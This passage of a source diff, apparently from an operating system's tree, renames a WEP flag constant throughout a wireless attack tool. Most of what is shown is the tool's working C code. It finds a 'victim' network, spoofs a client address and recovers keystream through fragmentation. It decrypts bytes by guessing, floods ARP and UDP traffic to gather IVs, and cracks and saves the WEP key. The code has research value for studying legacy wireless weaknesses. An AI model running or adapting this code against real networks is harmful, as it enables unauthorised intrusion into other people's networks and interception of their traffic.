dlen == PADDED_ARPLEN) && !decryptstate.cipher && !netip) { decrypt_arpreq(wh, rd); } // we have prga... check if its our stuff being relayed... if (prgainfo.len != 0) { // looks like it... if ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) && (memcmp(wh->i_addr3, mymac, 6) == 0) && (memcmp(wh->i_addr1, "\xff\xff\xff\xff\xff\xff", 6) == 0) && dlen == fragstate.len) { // printf("I fink AP relayed it...\n"); set_prga(body, &body[4], fragstate.data, dlen); free(fragstate.data); fragstate.data = 0; fragstate.waiting_relay = 0; } // see if we get the multicast stuff of when decrypting if ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) && (memcmp(wh->i_addr3, mymac, 6) == 0) && (memcmp(wh->i_addr1, MCAST_PREF, 5) == 0) && dlen == 36) { unsigned char pr = wh->i_addr1[5]; printf("\n"); time_print("Got clear-text byte: %d\n", decryptstate.cipher[decryptstate.prgainfo.len-1] ^ pr); decryptstate.prgainfo.prga[decryptstate.prgainfo.len-1] = pr; decryptstate.prgainfo.len++; decryptstate.fragstate.waiting_relay = 1; // ok we got the ip... if (decryptstate.prgainfo.len == 26+1) { unsigned char ip[4]; int i; struct in_addr *in = (struct in_addr*) ip; unsigned char *ptr; for (i = 0; i < 4; i++) ip[i] = decryptstate.cipher[8+8+6+i] ^ decryptstate.prgainfo.prga[8+8+6+i]; assert(!netip); netip = (unsigned char*) malloc(16); if(!netip) { perror("malloc()"); exit(1); } memset(netip, 0, 16); strcpy(netip, inet_ntoa(*in)); time_print("Got IP=(%s)\n", netip); strcpy(myip, netip); ptr = strchr(myip, '.'); assert(ptr); ptr = strchr(ptr+1, '.'); assert(ptr); ptr = strchr(ptr+1, '.'); assert(ptr); strcpy(ptr+1,"123"); time_print("My IP=(%s)\n", myip); free(decryptstate.prgainfo.prga); free(decryptstate.cipher); memset(&decryptstate, 0, sizeof(decryptstate)); } } return; } clearsize = known_clear(clear, wh, dlen); time_print("Datalen %d Known clear %d\n", dlen, clearsize); set_prga(body, &body[4], clear, clearsize); } void stuff_for_net(struct ieee80211_frame* wh, int rd) { int type,stype; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if (type == IEEE80211_FC0_TYPE_DATA && stype == IEEE80211_FC0_SUBTYPE_DATA) { int dlen = rd - sizeof(struct ieee80211_frame); if (state == SPOOF_MAC) { unsigned char mac[6]; if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) { memcpy(mac, wh->i_addr3, 6); } else if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) { memcpy(mac, wh->i_addr1, 6); } else assert(0); if (mac[0] == 0xff || mac[0] == 0x1) return; memcpy(mymac, mac, 6); time_print("Trying to use MAC=(%s)\n", mac2str(mymac)); state = FOUND_VICTIM; return; } // wep data! - if ( (wh->i_fc[1] & IEEE80211_FC1_WEP) && dlen > (4+8+4)) { + if ( (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) && + dlen > (4+8+4)) { got_wep(wh, rd); } } } void anal(unsigned char* buf, int rd, int tx) { // yze struct ieee80211_frame* wh = (struct ieee80211_frame *) buf; int type,stype; static int lastseq = -1; int seq; unsigned short *seqptr; int for_us = 0; if (rd < 1) { time_print("rd=%d\n", rd); exit(1); } type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; // sort out acks if (state >= FOUND_VICTIM) { // stuff for us if (memcmp(wh->i_addr1, mymac, 6) == 0) { for_us = 1; if (type != IEEE80211_FC0_TYPE_CTL) send_ack(tx); } } // XXX i know it aint great... seqptr = (unsigned short*) wh->i_seq; seq = (*seqptr & IEEE80211_SEQ_SEQ_MASK) >> IEEE80211_SEQ_SEQ_SHIFT; if (seq == lastseq && (wh->i_fc[1] & IEEE80211_FC1_RETRY) && type != IEEE80211_FC0_TYPE_CTL) { // printf("Ignoring dup packet... seq=%d\n", seq); return; } lastseq = seq; // management frame if (type == IEEE80211_FC0_TYPE_MGT) { if(state == FIND_VICTIM) { if (stype == IEEE80211_FC0_SUBTYPE_BEACON || stype == IEEE80211_FC0_SUBTYPE_PROBE_RESP) { if (get_victim_ssid(wh, rd)) { return; } } } } if (state >= FOUND_VICTIM) { // stuff for us if (for_us) { stuff_for_us(wh, rd); } // stuff in network [even for us] if ( ((wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) && (memcmp(victim.bss, wh->i_addr1, 6) == 0)) || ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) && (memcmp(victim.bss, wh->i_addr2, 6) == 0)) ) { stuff_for_net(wh, rd); } } } void do_arp(unsigned char* buf, unsigned short op, unsigned char* m1, unsigned char* i1, unsigned char* m2, unsigned char* i2) { struct in_addr sip; struct in_addr dip; struct arphdr* h; unsigned char* data; inet_aton(i1, &sip); inet_aton(i2, &dip); h = (struct arphdr*) buf; memset(h, 0, sizeof(*h)); h->ar_hrd = htons(ARPHRD_ETHER); h->ar_pro = htons(ETHERTYPE_IP); h->ar_hln = 6; h->ar_pln = 4; h->ar_op = htons(op); data = (unsigned char*) h + sizeof(*h); memcpy(data, m1, 6); data += 6; memcpy(data, &sip, 4); data += 4; memcpy(data, m2, 6); data += 6; memcpy(data, &dip, 4); data += 4; } void send_fragment(int tx, struct frag_state* fs, struct prga_info *pi) { unsigned char buf[4096]; struct ieee80211_frame* wh; unsigned char* body; int fragsize; uLong crc; unsigned long *pcrc; int i; unsigned short* seq; unsigned short sn, fn; wh = (struct ieee80211_frame*) buf; memcpy(wh, &fs->wh, sizeof(*wh)); body = (unsigned char*) wh + sizeof(*wh); memcpy(body, &pi->iv, 3); body += 3; *body++ = 0; // key index fragsize = fs->data + fs->len - fs->ptr; assert(fragsize > 0); if ( (fragsize + 4) > pi->len) { fragsize = pi->len - 4; wh->i_fc[1] |= IEEE80211_FC1_MORE_FRAG; } // last fragment else { wh->i_fc[1] &= ~IEEE80211_FC1_MORE_FRAG; } memcpy(body, fs->ptr, fragsize); crc = crc32(0L, Z_NULL, 0); crc = crc32(crc, body, fragsize); pcrc = (unsigned long*) (body+fragsize); *pcrc = crc; for (i = 0; i < (fragsize + 4); i++) body[i] ^= pi->prga[i]; seq = (unsigned short*) &wh->i_seq; sn = (*seq & IEEE80211_SEQ_SEQ_MASK) >> IEEE80211_SEQ_SEQ_SHIFT; fn = *seq & IEEE80211_SEQ_FRAG_MASK; // printf ("Sent frag (data=%d) (seq=%d fn=%d)\n", fragsize, sn, fn); send_frame(tx, buf, sizeof(*wh) + 4 + fragsize+4); seq = (unsigned short*) &fs->wh.i_seq; *seq = fnseq(++fn, sn); fs->ptr += fragsize; if (fs->ptr - fs->data == fs->len) { // printf("Finished sending frags...\n"); fs->waiting_relay = 1; } } void prepare_fragstate(struct frag_state* fs, int pad) { fs->waiting_relay = 0; fs->len = 8 + 8 + 20 + pad; fs->data = (unsigned char*) malloc(fs->len); if(!fs->data) { perror("malloc()"); exit(1); } fs->ptr = fs->data; do_llc(fs->data, ETHERTYPE_ARP); do_arp(&fs->data[8], ARPOP_REQUEST, mymac, myip, "\x00\x00\x00\x00\x00\x00", "192.168.0.1"); memset(&fs->wh, 0, sizeof(fs->wh)); fill_basic(&fs->wh); memset(fs->wh.i_addr3, 0xff, 6); fs->wh.i_fc[0] |= IEEE80211_FC0_TYPE_DATA; fs->wh.i_fc[1] |= IEEE80211_FC1_DIR_TODS | IEEE80211_FC1_MORE_FRAG | - IEEE80211_FC1_WEP; + IEEE80211_FC1_PROTECTED; memset(&fs->data[8+8+20], 0, pad); } void discover_prga(int tx) { // create packet... if (!fragstate.data) { int pad = 0; if (prgainfo.len >= 20) pad = prgainfo.len*3; prepare_fragstate(&fragstate, pad); } if (!fragstate.waiting_relay) { send_fragment(tx, &fragstate, &prgainfo); if (fragstate.waiting_relay) { if (gettimeofday(&fragstate.last, NULL) == -1) err(1, "gettimeofday()"); } } } void decrypt(int tx) { // gotta initiate if (!decryptstate.fragstate.data) { prepare_fragstate(&decryptstate.fragstate, 0); memcpy(decryptstate.fragstate.wh.i_addr3, MCAST_PREF, 5); decryptstate.fragstate.wh.i_addr3[5] = decryptstate.prgainfo.prga[decryptstate.prgainfo.len-1]; decryptstate.prgainfo.len++; } // guess diff prga byte... if (decryptstate.fragstate.waiting_relay) { unsigned short* seq; decryptstate.prgainfo.prga[decryptstate.prgainfo.len-1]++; #if 0 if (decryptstate.prgainfo.prga[decryptstate.prgainfo.len-1] == 0) { printf("Can't decrpyt!\n"); exit(1); } #endif decryptstate.fragstate.wh.i_addr3[5] = decryptstate.prgainfo.prga[decryptstate.prgainfo.len-1]; decryptstate.fragstate.waiting_relay = 0; decryptstate.fragstate.ptr = decryptstate.fragstate.data; seq = (unsigned short*) &decryptstate.fragstate.wh.i_seq; *seq = fnseq(0, txstate.psent); } send_fragment(tx, &decryptstate.fragstate, &decryptstate.prgainfo); } void flood_inet(tx) { static int send_arp = -1; static unsigned char arp_pkt[128]; static int arp_len; static unsigned char udp_pkt[128]; static int udp_len; static struct timeval last_ip; // need to init packets... if (send_arp == -1) { unsigned char* body; unsigned char* ptr; struct ieee80211_frame* wh; struct ip* ih; struct udphdr* uh; memset(arp_pkt, 0, sizeof(arp_pkt)); memset(udp_pkt, 0, sizeof(udp_pkt)); // construct ARP wh = (struct ieee80211_frame*) arp_pkt; fill_basic(wh); wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; - wh->i_fc[1] |= IEEE80211_FC1_WEP | IEEE80211_FC1_DIR_TODS; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS; memset(wh->i_addr3, 0xff, 6); body = (unsigned char*) wh + sizeof(*wh); ptr = body; ptr += 4; // iv do_llc(ptr, ETHERTYPE_ARP); ptr += 8; do_arp(ptr, ARPOP_REQUEST, mymac, myip, "\x00\x00\x00\x00\x00\x00", netip); wepify(body, 8+8+20); arp_len = sizeof(*wh) + 4 + 8 + 8 + 20 + 4; assert(arp_len < sizeof(arp_pkt)); // construct UDP wh = (struct ieee80211_frame*) udp_pkt; fill_basic(wh); wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; - wh->i_fc[1] |= IEEE80211_FC1_WEP | IEEE80211_FC1_DIR_TODS; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS; memcpy(wh->i_addr3, rtrmac, 6); body = (unsigned char*) wh + sizeof(*wh); ptr = body; ptr += 4; // iv do_llc(ptr, ETHERTYPE_IP); ptr += 8; ih = (struct ip*) ptr; ih->ip_hl = 5; ih->ip_v = 4; ih->ip_tos = 0; ih->ip_len = htons(20+8+5); ih->ip_id = htons(666); ih->ip_off = 0; ih->ip_ttl = 128; ih->ip_p = IPPROTO_UDP; ih->ip_sum = 0; inet_aton(myip, &ih->ip_src); inet_aton(floodip, &ih->ip_dst); ih->ip_sum = in_cksum((unsigned short*)ih, 20); ptr += 20; uh = (struct udphdr*) ptr; uh->uh_sport = htons(floodsport); uh->uh_dport = htons(floodport); uh->uh_ulen = htons(8+5); uh->uh_sum = 0; ptr += 8; strcpy(ptr, "sorbo"); uh->uh_sum = udp_checksum(ptr - 8, 8+5, &ih->ip_src, &ih->ip_dst); wepify(body, 8+20+8+5); udp_len = sizeof(*wh) + 4 + 8 + 20 + 8 + 5 + 4; assert(udp_len < sizeof(udp_pkt)); // bootstrap send_arp = 1; memset(&last_ip, 0, sizeof(last_ip)); } if (send_arp == 1) { struct timeval now; unsigned long sec; if (gettimeofday(&now, NULL) == -1) { perror("gettimeofday()"); exit(1); } sec = now.tv_sec - last_ip.tv_sec; if (sec < 5) return; send_frame(tx, arp_pkt, arp_len); send_arp = 0; } else if (send_arp == 0) { if (gettimeofday(&last_ip, NULL) == -1) { perror("gettimeofday()"); exit(1); } send_frame(tx, udp_pkt, udp_len); send_arp = 1; } else assert(0); } void send_arp(int tx, unsigned short op, unsigned char* srcip, unsigned char* srcmac, unsigned char* dstip, unsigned char* dstmac) { static unsigned char arp_pkt[128]; unsigned char* body; unsigned char* ptr; struct ieee80211_frame* wh; int arp_len; memset(arp_pkt, 0, sizeof(arp_pkt)); // construct ARP wh = (struct ieee80211_frame*) arp_pkt; fill_basic(wh); wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; - wh->i_fc[1] |= IEEE80211_FC1_WEP | IEEE80211_FC1_DIR_TODS; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS; memset(wh->i_addr3, 0xff, 6); body = (unsigned char*) wh + sizeof(*wh); ptr = body; ptr += 4; // iv do_llc(ptr, ETHERTYPE_ARP); ptr += 8; do_arp(ptr, op, srcmac, srcip, dstmac, dstip); wepify(body, 8+8+20); arp_len = sizeof(*wh) + 4 + 8 + 8 + 20 + 4; assert(arp_len < sizeof(arp_pkt)); send_frame(tx, arp_pkt, arp_len); } void can_write(int tx) { static char arp_ip[16]; switch (state) { case FOUND_VICTIM: send_auth(tx); state = SENDING_AUTH; break; case GOT_AUTH: send_assoc(tx); state = SENDING_ASSOC; break; case GOT_ASSOC: if (prgainfo.prga && prgainfo.len < min_prga) { discover_prga(tx); break; } if (decryptstate.cipher) { decrypt(tx); break; } if (!prgainfo.prga) break; if (taptx_len) { send_frame(tx, taptx, taptx_len); taptx_len = 0; break; } // try to find rtr mac addr if (netip && !rtrmac) { char* ptr; strcpy(arp_ip, netip); if (!netip_arg) { ptr = strchr(arp_ip, '.'); assert(ptr); ptr = strchr(++ptr, '.'); assert(ptr); ptr = strchr(++ptr, '.'); assert(ptr); strcpy(++ptr, "1"); } if (gettimeofday(&arpsend, NULL) == -1) err(1, "gettimeofday()"); time_print("Sending arp request for: %s\n", arp_ip); send_arp(tx, ARPOP_REQUEST, myip, mymac, arp_ip, "\x00\x00\x00\x00\x00\x00"); // XXX lame rtrmac = (unsigned char*)1; break; } // need to generate traffic... if (rtrmac > (unsigned char*)1 && netip) { if (floodip) flood_inet(tx); else { // XXX lame technique... anyway... im // only interested in flood_inet... // could ping broadcast.... send_arp(tx, ARPOP_REQUEST, myip, mymac, arp_ip, "\x00\x00\x00\x00\x00\x00"); } break; } break; } } void save_key(unsigned char *key, int len) { char tmp[16]; char k[64]; int fd; int rd; assert(len*3 < sizeof(k)); k[0] = 0; while (len--) { sprintf(tmp, "%.2X", *key++); strcat(k, tmp); if (len) strcat(k, ":"); } fd = open(KEY_FILE, O_WRONLY | O_CREAT, 0644); if (fd == -1) err(1, "open()"); printf("\nKey: %s\n", k); rd = write(fd, k, strlen(k)); if (rd == -1) err(1, "write()"); if (rd != strlen(k)) errx(1, "write %d/%d\n", rd, strlen(k)); close(fd); } #define KEYLIMIT (1000000) int do_crack(void) { unsigned char key[PTW_KEYHSBYTES]; if(PTW_computeKey(ptw, key, 13, KEYLIMIT) == 1) { save_key(key, 13); return 1; } if(PTW_computeKey(ptw, key, 5, KEYLIMIT/10) == 1) { save_key(key, 5); return 1; } return 0; } void try_crack() { if (crack_pid) { printf("\n"); time_print("Warning... previous crack still running!\n"); kill_crack(); } if (weplog.fd) { if (fsync(weplog.fd) == -1) err(1, "fsync"); } crack_pid = fork(); if (crack_pid == -1) err(1, "fork"); // child if (crack_pid == 0) { if (!do_crack()) printf("\nCrack unsuccessful\n"); exit(1); } // parent printf("\n"); time_print("Starting crack PID=%d\n", crack_pid); if (gettimeofday(&crack_start, NULL) == -1) err(1, "gettimeofday"); wep_thresh += thresh_incr; } void open_tap() { struct stat st; int s; struct ifreq ifr; unsigned int flags; tapfd = open(TAP_DEV, O_RDWR); if (tapfd == -1) { printf("Can't open tap: %s\n", strerror(errno)); exit(1); } if(fstat(tapfd, &st) == -1) { perror("fstat()"); exit(1); } // feer strcpy(tapdev, devname(st.st_rdev, S_IFCHR)); s = socket(PF_INET, SOCK_DGRAM, 0); if (s == -1) { perror("socket()"); exit(1); } // MTU memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, tapdev); ifr.ifr_mtu = 1500; if (ioctl(s, SIOCSIFMTU, &ifr) == -1) { perror("ioctl(SIOCSIFMTU)"); exit(1); } // set iface up memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, tapdev); if (ioctl(s, SIOCGIFFLAGS, &ifr) == -1) { perror("ioctl(SIOCGIFFLAGS)"); exit(1); } flags = (ifr.ifr_flags & 0xffff) | (ifr.ifr_flagshigh << 16); flags |= IFF_UP; memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, tapdev); ifr.ifr_flags = flags & 0xffff; ifr.ifr_flagshigh = flags >> 16; if (ioctl(s, SIOCSIFFLAGS, &ifr) == -1) { perror("ioctl(SIOCSIFFLAGS)"); exit(1); } close(s); time_print("Opened tap device: %s\n", tapdev); } void read_tap() { unsigned char buf[4096]; struct ether_header* eh; struct ieee80211_frame* wh; int rd; unsigned char* ptr, *body; int dlen; rd = read(tapfd, buf, sizeof(buf)); if (rd == -1) { perror("read()"); exit(1); } dlen = rd - sizeof(*eh); assert(dlen > 0); if (dlen+8 > prgainfo.len) { printf("\n"); // XXX lame message... time_print("Sorry... want to send %d but only got %d prga\n", dlen, prgainfo.len); return; } if (taptx_len) { printf("\n"); time_print("Sorry... overflow in TAP queue [of 1 packet =P] overwriting\n"); // XXX could not read instead and get rid of it in select... } assert (rd < (sizeof(buf)-sizeof(*wh) - 8 - 8)); eh = (struct ether_header*) buf; wh = (struct ieee80211_frame*) taptx; memset(wh, 0, sizeof(*wh)); fill_basic(wh); wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; - wh->i_fc[1] |= IEEE80211_FC1_WEP | IEEE80211_FC1_DIR_TODS; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS; memcpy(wh->i_addr2, eh->ether_shost, 6); memcpy(wh->i_addr3, eh->ether_dhost, 6); body = (unsigned char*) wh + sizeof(*wh); ptr = body; ptr += 4; // iv do_llc(ptr, ntohs(eh->ether_type)); ptr += 8; memcpy(ptr, &buf[sizeof(*eh)], dlen); wepify(body, 8+dlen); taptx_len = sizeof(*wh) + 4 + 8 + dlen + 4; assert (taptx_len < sizeof(taptx)); } int elapsedd(struct timeval *past, struct timeval *now) { int el; el = now->tv_sec - past->tv_sec; assert(el >= 0); if (el == 0) { el = now->tv_usec - past->tv_usec; } else { el = (el - 1)*1000*1000; el += 1000*1000-past->tv_usec; el += now->tv_usec; } return el; } static unsigned char *get_80211(unsigned char **data, int *totlen, int *plen) { #define BIT(n) (1<<(n)) struct bpf_hdr *bpfh; struct ieee80211_radiotap_header *rth; uint32_t present; uint8_t rflags; void *ptr; static int nocrc = 0; assert(*totlen); /* bpf hdr */ bpfh = (struct bpf_hdr*) (*data); assert(bpfh->bh_caplen == bpfh->bh_datalen); /* XXX */ *totlen -= bpfh->bh_hdrlen; /* check if more packets */ if ((int)bpfh->bh_caplen < *totlen) { int tot = bpfh->bh_hdrlen + bpfh->bh_caplen; int offset = BPF_WORDALIGN(tot); *data = (char*)bpfh + offset; *totlen -= offset - tot; /* take into account align bytes */ } else if ((int)bpfh->bh_caplen > *totlen) abort(); *plen = bpfh->bh_caplen; *totlen -= bpfh->bh_caplen; assert(*totlen >= 0); /* radiotap */ rth = (struct ieee80211_radiotap_header*) ((char*)bpfh + bpfh->bh_hdrlen); /* XXX cache; drivers won't change this per-packet */ /* check if FCS/CRC is included in packet */ present = le32toh(rth->it_present); if (present & BIT(IEEE80211_RADIOTAP_FLAGS)) { if (present & BIT(IEEE80211_RADIOTAP_TSFT)) rflags = ((const uint8_t *)rth)[8]; else rflags = ((const uint8_t *)rth)[0]; } else rflags = 0; *plen -= rth->it_len; assert(*plen > 0); /* 802.11 CRC */ if (nocrc || (rflags & IEEE80211_RADIOTAP_F_FCS)) { *plen -= IEEE80211_CRC_LEN; nocrc = 1; } ptr = (char*)rth + rth->it_len; return ptr; #undef BIT } static int read_packet(int fd, unsigned char *dst, int len) { static unsigned char buf[4096]; static int totlen = 0; static unsigned char *next = buf; unsigned char *pkt; int plen; assert(len > 0); /* need to read more */ if (totlen == 0) { totlen = read(fd, buf, sizeof(buf)); if (totlen == -1) { totlen = 0; return -1; } next = buf; } /* read 802.11 packet */ pkt = get_80211(&next, &totlen, &plen); if (plen > len) plen = len; assert(plen > 0); memcpy(dst, pkt, plen); return plen; } void own(int wifd) { unsigned char buf[4096]; int rd; fd_set rfd; struct timeval tv; char *pbar = "/-\\|"; char *pbarp = &pbar[0]; struct timeval lasthop; struct timeval now; unsigned int last_wep_count = 0; struct timeval last_wcount; struct timeval last_status; int fd; int largest; weplog.fd = open(WEP_FILE, O_WRONLY | O_APPEND); if (weplog.fd == -1) { struct pcap_file_header pfh; memset(&pfh, 0, sizeof(pfh)); pfh.magic = TCPDUMP_MAGIC; pfh.version_major = PCAP_VERSION_MAJOR; pfh.version_minor = PCAP_VERSION_MINOR; pfh.thiszone = 0; pfh.sigfigs = 0; pfh.snaplen = 65535; pfh.linktype = LINKTYPE_IEEE802_11; weplog.fd = open(WEP_FILE, O_WRONLY | O_CREAT, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH); if (weplog.fd != -1) { if (write(weplog.fd, &pfh, sizeof(pfh)) != sizeof(pfh)) err(1, "write()"); } } else { time_print("WARNING: Appending in %s\n", WEP_FILE); } if (weplog.fd == -1) { perror("open()"); exit(1); } fd = open(PRGA_FILE, O_RDONLY); if (fd != -1) { time_print("WARNING: reading prga from %s\n", PRGA_FILE); rd = read(fd, buf, sizeof(buf)); if (rd == -1) { perror("read()"); exit(1); } if (rd >= 8) { set_prga(buf, NULL, &buf[3], rd - 3); } close(fd); } fd = open(DICT_PATH, O_RDONLY); if (fd == -1) { time_print("Creating dictionary directory (%s)\n", DICT_PATH); if (mkdir (DICT_PATH, 0755) == -1) { perror("mkdir()"); exit(1); } } else close(fd); open_tap(); set_if_mac(mymac, tapdev); time_print("Set tap MAC to: %s\n", mac2str(mymac)); if (tapfd > wifd) largest = tapfd; else largest = wifd; if (signal(SIGINT, &cleanup) == SIG_ERR) { perror("signal()"); exit(1); } if (signal (SIGTERM, &cleanup) == SIG_ERR) { perror("signal()"); exit(1); } time_print("Looking for a victim...\n"); if (gettimeofday(&lasthop, NULL) == -1) { perror("gettimeofday()"); exit(1); } memcpy(&last_wcount, &lasthop, sizeof(last_wcount)); memcpy(&last_status, &lasthop, sizeof(last_status)); while (1) { if (gettimeofday(&now, NULL) == -1) { perror("gettimeofday()"); exit(1); } /* check for relay timeout */ if (fragstate.waiting_relay) { int el; el = now.tv_sec - fragstate.last.tv_sec; assert (el >= 0); if (el == 0) { el = now.tv_usec - fragstate.last.tv_usec; } else { el--; el *= 1000*1000; el += 1000*1000 - fragstate.last.tv_usec; el += now.tv_usec; if (el > (1500*1000)) { // printf("\nLAMER timeout\n\n"); free(fragstate.data); fragstate.data = 0; } } } /* check for arp timeout */ if (rtrmac == (unsigned char*) 1) { int el; el = elapsedd(&arpsend, &now); if (el >= (1500*1000)) { rtrmac = 0; } } // status bar if ( (now.tv_sec > last_status.tv_sec ) || ( now.tv_usec - last_status.tv_usec > 100*1000)) { if (crack_pid && (now.tv_sec > last_status.tv_sec)) { check_key(); } if (netip && prgainfo.len >= min_prga && rtrmac > (unsigned char*) 1) { time_print("WEP=%.9d (next crack at %d) IV=%.2x:%.2x:%.2x (rate=%d) \r", weplog.packets, wep_thresh, weplog.iv[0], weplog.iv[1], weplog.iv[2], weplog.rate); fflush(stdout); } else { if (state == FIND_VICTIM) time_print("Chan %.02d %c\r", chaninfo.chan, *pbarp); else if (decryptstate.cipher) { int pos = decryptstate.prgainfo.len - 1; unsigned char prga = decryptstate.prgainfo.prga[pos]; assert(pos); time_print("Guessing PRGA %.2x (IP byte=%d) \r", prga, decryptstate.cipher[pos] ^ prga); } else time_print("%c\r", *pbarp); fflush(stdout); } memcpy(&last_status, &now,sizeof(last_status)); } // check if we are cracking if (crack_pid) { if (now.tv_sec - crack_start.tv_sec >= crack_dur) kill_crack(); } // check TX / retransmit if (txstate.waiting_ack) { unsigned int elapsed = now.tv_sec - txstate.tsent.tv_sec; elapsed *= 1000*1000; elapsed += (now.tv_usec - txstate.tsent.tv_usec); if (elapsed >= ack_timeout) send_frame(wifd, NULL, -1); } // INPUT // select FD_ZERO(&rfd); FD_SET(wifd, &rfd); FD_SET(tapfd, &rfd); tv.tv_sec = 0; tv.tv_usec = 1000*10; rd = select(largest+1, &rfd, NULL, NULL, &tv); if (rd == -1) { perror("select()"); exit(1); } // read if (rd != 0) { // wifi if (FD_ISSET(wifd, &rfd)) { rd = read_packet(wifd, buf, sizeof(buf)); if (rd == 0) return; if (rd == -1) { perror("read()"); exit(1); } pbarp++; if(!(*pbarp)) pbarp = &pbar[0]; // input anal(buf, rd, wifd); } // tap if (FD_ISSET(tapfd, &rfd)) { read_tap(); } } // check state and what we do next. if (state == FIND_VICTIM) { if (now.tv_sec > lasthop.tv_sec || ( (now.tv_usec - lasthop.tv_usec) >= 300*1000 )) { int chan = chaninfo.chan; chan++; if(chan > max_chan) chan = 1; set_chan(chan); memcpy(&lasthop, &now, sizeof(lasthop)); } } else { // check if we need to write something... if (!txstate.waiting_ack) can_write(wifd); // roughly! #ifdef MORE_ACCURATE if ( (now.tv_sec - last_wcount.tv_sec) >= 2) { unsigned int elapsed; int secs; int packetz = weplog.packets - last_wep_count; elapsed = 1000*1000; elapsed -= last_wcount.tv_usec; assert(elapsed >= 0); elapsed += now.tv_usec; secs = now.tv_sec - last_wcount.tv_sec; secs--; if (secs > 0) elapsed += (secs*1000*1000); weplog.rate = (int) ((double)packetz/(elapsed/1000.0/1000.0)); #else if ( now.tv_sec > last_wcount.tv_sec) { weplog.rate = weplog.packets - last_wep_count; #endif last_wep_count = weplog.packets; memcpy(&last_wcount, &now, sizeof(now)); if (wep_thresh != -1 && weplog.packets > wep_thresh) try_crack(); } } } } void start(char *dev) { int fd; setup_if(dev); fd = open_bpf(dev, DLT_IEEE802_11_RADIO); ptw = PTW_newattackstate(); if (!ptw) err(1, "PTW_newattackstate()"); own(fd); #if 0 { int i; struct timeval tv; set_chan(11); for (i = 0; i < 10; i++) { gettimeofday(&tv, NULL); send_ack(tx); // usleep(500); printf("%lu\n", tv.tv_usec); } } #endif close(fd); } void usage(char* pname) { printf("Usage: %s \n", pname); printf("-h\t\tthis lame message\n"); printf("-i\t\t\n"); printf("-s\t\t\n"); printf("-m\t\t\n"); printf("-n\t\t\n"); printf("-r\t\t\n"); printf("-a\t\t\n"); printf("-c\t\tdo not crack\n"); printf("-p\t\t\n"); printf("-4\t\t64 bit key\n"); printf("-v\t\tvictim mac\n"); printf("-t\t\t\n"); printf("-f\t\t\n"); exit(0); } void str2mac(unsigned char* dst, unsigned char* mac) { unsigned int macf[6]; int i; if( sscanf(mac, "%x:%x:%x:%x:%x:%x", &macf[0], &macf[1], &macf[2], &macf[3], &macf[4], &macf[5]) != 6) { printf("can't parse mac %s\n", mac); exit(1); } for (i = 0; i < 6; i++) *dst++ = (unsigned char) macf[i]; } int main(int argc, char *argv[]) { unsigned char* dev = "ath0"; unsigned char rtr[6]; unsigned char vic[6]; int ch; if (gettimeofday(&real_start, NULL) == -1) { perror("gettimeofday()"); exit(1); } chaninfo.s = -1; victim.ssid = 0; prgainfo.len = 0; memset(&txstate, 0, sizeof(txstate)); memset(&fragstate, 0, sizeof(fragstate)); memset(&decryptstate, 0, sizeof(decryptstate)); memset(&weplog, 0, sizeof(weplog)); state = FIND_VICTIM; while ((ch = getopt(argc, argv, "hi:s:m:r:a:n:cp:4v:t:f:")) != -1) { switch (ch) { case 'a': str2mac(mymac, optarg); break; case 's': floodip = optarg; break; case 'i': dev = optarg; break; case 'm': strncpy(myip, optarg, sizeof(myip)-1); myip[sizeof(myip)-1] = 0; break; case 'n': netip = optarg; netip_arg = 1; break; case 'r': str2mac(rtr, optarg); rtrmac = rtr; break; case 'v': str2mac(vic, optarg); victim_mac = vic; break; case 'c': wep_thresh = -1; break; case 'p': min_prga = atoi(optarg); break; case 't': thresh_incr = wep_thresh = atoi(optarg); break; case 'f': max_chan = atoi(optarg); break; case '4': bits = 64; break; default: usage(argv[0]); break; } } start(dev); if(chaninfo.s != -1) close(chaninfo.s); if(victim.ssid) free(victim.ssid); exit(0); } diff --git a/tools/tools/net80211/wlaninject/wlaninject.c b/tools/tools/net80211/wlaninject/wlaninject.c index 7527e942794d..215182a95c7b 100644 --- a/tools/tools/net80211/wlaninject/wlaninject.c +++ b/tools/tools/net80211/wlaninject/wlaninject.c @@ -1,806 +1,806 @@ /*- * Copyright (c) 2006, Andrea Bittau * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 